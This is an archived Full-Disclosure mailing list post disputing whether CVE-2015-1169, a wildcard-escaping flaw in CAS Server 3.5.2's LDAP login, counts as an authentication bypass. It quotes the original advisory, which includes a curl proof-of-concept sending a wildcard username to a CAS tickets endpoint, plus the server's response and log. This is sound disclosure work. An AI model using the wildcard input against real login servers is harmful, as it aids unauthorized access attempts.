lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20150129014835.GD4951@bender.unx.csupomona.edu>
Date: Wed, 28 Jan 2015 17:48:35 -0800
From: "Paul B. Henson" <henson@....org>
To: fulldisclosure@...lists.org
Subject: Re: [FD] CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers
 to bypass LDAP authentication via crafted wildcards.

This CVE claims CAS has a vulnerability that "allows remote attackers to
bypass LDAP authentication via crafted wildcards". My understanding of
an "authentication bypass" vulnerability is one that actually bypasses
authentication, accessing a resource without having to authenticate, as
enumerated at http://cwe.mitre.org/data/definitions/592.html

The actual vulnerability here is that if you are using the LDAP
authenticator that does a search for the supplied username and then
authenticates against the DN returned (as opposed to the LDAP
authenticator that directly constructs a bind DN from the username), it
does not properly escape wildcards in the supplied username when it does
the search, allowing you to authenticate with a username consisting of a
wildcard that matches the username *AND* the valid password for that
username. In addition, the supplied wildcard must match one and only one
entry in the ldap directory, as authentication will fail otherwise.

I don't think this is in any way an authentication bypass.
Authentication is being performed with an (almost valid) username and a
valid password, and while the issue does allow you to use a username
that's not an exact match, it still requires you to know the correct
password for that username and for the "not exact" match to be so
specific as to only match one user.

On Wed, Jan 21, 2015 at 12:49:38PM -0200, J. Tozo wrote:
> =====[Alligator Security Team - Security Advisory]========
> 
>   CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
> authentication via crafted wildcards.
> 
>   Reporter: José Tozo  < juniorbsd () gmail com >
> 
> =====[Table of Contents]==================================
> 
> 1. Background
> 2. Detailed description
> 3. Other contexts & solutions
> 4. Timeline
> 5. References
> 
> =====[1. Background]======================================
> 
>  CAS is an authentication system originally created by Yale University to
> provide a trusted way for an application to authenticate a user.
> 
> =====[2. Detailed description]============================
> 
> A valid username and password required.
> 
> Given a username johndoe and a password superpass, you can sucessfully
> achieve login using wildcards:
> 
> username: jo*
> password: superpass
> 
> The login will be sucessfully only if the ldap bind search return one
> unique member.
> 
> The vulnerability described in this document can be validated using the
> following example:
> 
> Client Request:
> root@...hine:/# curl -k -L -d "username=jo%2A&password=superpass"
> https://login.cas-server.com/v1/tickets
> 
> (note that * was url encoded to %2A)
> 
> <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
> <html>
>    <head>
>       <title>201 The request has been fulfilled and resulted in a new
> resource being created</title>
>    </head>
>    <body>
>       <h1>TGT Created</h1>
>       <form action="
> https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz"
> method="POST">Service:<input type="text" name="service" value=""><br><input
> type="submit" value="Submit"></form>
>    </body>
> </html>
> 
> Server log:
> =============================================================
> WHO: [username: jo*]
> WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
> ACTION: TICKET_GRANTING_TICKET_CREATED
> APPLICATION: CAS
> WHEN: Tue Jan 20 18:38:17 BRST 2015
> CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
> SERVER IP ADDRESS: xxx.xxx.xxx.xxx
> =============================================================
> 
> =====[3. Other contexts & solutions]======================
> 
>  In order to apply the patch, you have to update at least to version 3.5.3.
> Newer versions, such as CAS 4.0.0 and above, are not vulnerable.
> 
> =====[4. Timeline]========================================
> 
> 29/12/14 Vendor notification.
> 14/01/15 Vendor rolled out new version 3.5.3
> 17/01/15 Mitre assigned CVE-2015-1169.
> 21/01/15 Disclosure date.
> 
> =====[5. References]=======================================
> 
> 1 - https://github.com/Jasig/cas/pull/411
> 2 -
> https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c
> 
> -- 
> Grato,
> 
>  Tozo

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ